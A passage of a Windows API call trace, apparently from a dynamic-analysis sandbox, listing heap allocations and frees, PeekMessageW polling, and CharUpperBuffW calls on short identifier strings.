lpMsg=0x8bf710) returned 0 [0205.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0205.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0205.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0205.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0205.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0205.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb5e0) returned 0x24d7a58 [0205.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0205.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0205.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0205.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0205.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0205.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0205.923] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0205.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0205.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0205.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0205.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0205.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0205.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0205.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0205.923] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0205.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0205.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0205.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0205.923] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0205.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0205.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0205.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0205.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18b8 [0205.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0205.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0205.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0205.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0205.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb5e0) returned 0x24d7a58 [0205.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0205.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1948 [0205.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0205.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0205.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0205.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2da8 [0205.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0205.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0205.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0205.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b10b8 [0205.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0205.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0205.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0205.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1d0 [0205.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0205.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0205.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0205.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0205.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0205.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0205.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0205.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb5e0) returned 0x34b2250 [0205.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0205.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0205.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0205.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0205.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0205.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0205.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0205.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0205.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0205.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0205.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0205.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0205.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0205.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0205.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0205.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0205.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0205.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0205.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0205.932] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0205.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0205.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0205.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0205.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0205.933] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0205.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0205.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0205.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0205.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0205.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0205.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0205.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0205.933] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0205.933] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0205.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0205.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0205.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0205.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0205.933] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0205.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0205.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0205.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0205.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0205.934] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0205.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0205.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0205.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0205.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0205.934] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0205.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0205.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0205.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0205.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0205.934] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0205.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0205.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0205.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0205.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0205.935] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.935] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0205.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0205.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0205.935] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0205.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0205.935] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0205.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0205.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0205.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0205.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0205.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0205.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0205.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0205.936] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0205.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0205.936] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0205.936] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0205.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0205.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0205.936] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0205.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0205.936] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0205.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0205.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0205.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0205.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0205.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0205.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0205.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0205.937] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0205.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0205.937] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0205.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0205.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0205.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0205.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0205.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0205.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0205.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0205.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0205.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0205.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0205.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0205.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0205.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0205.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0205.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0205.937] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0205.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0205.937] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0205.937] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0205.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0205.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0205.938] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0205.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0205.938] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0205.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0205.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0205.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0205.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0205.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0205.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0205.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0205.938] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0205.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0205.938] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0205.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0205.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0205.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0205.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0205.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0205.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0205.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0205.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0205.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0205.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0205.939] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0205.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0205.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0205.939] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0205.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0205.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0205.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0205.939] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.939] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0205.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0205.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0205.939] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0205.939] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.939] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0205.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0205.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: 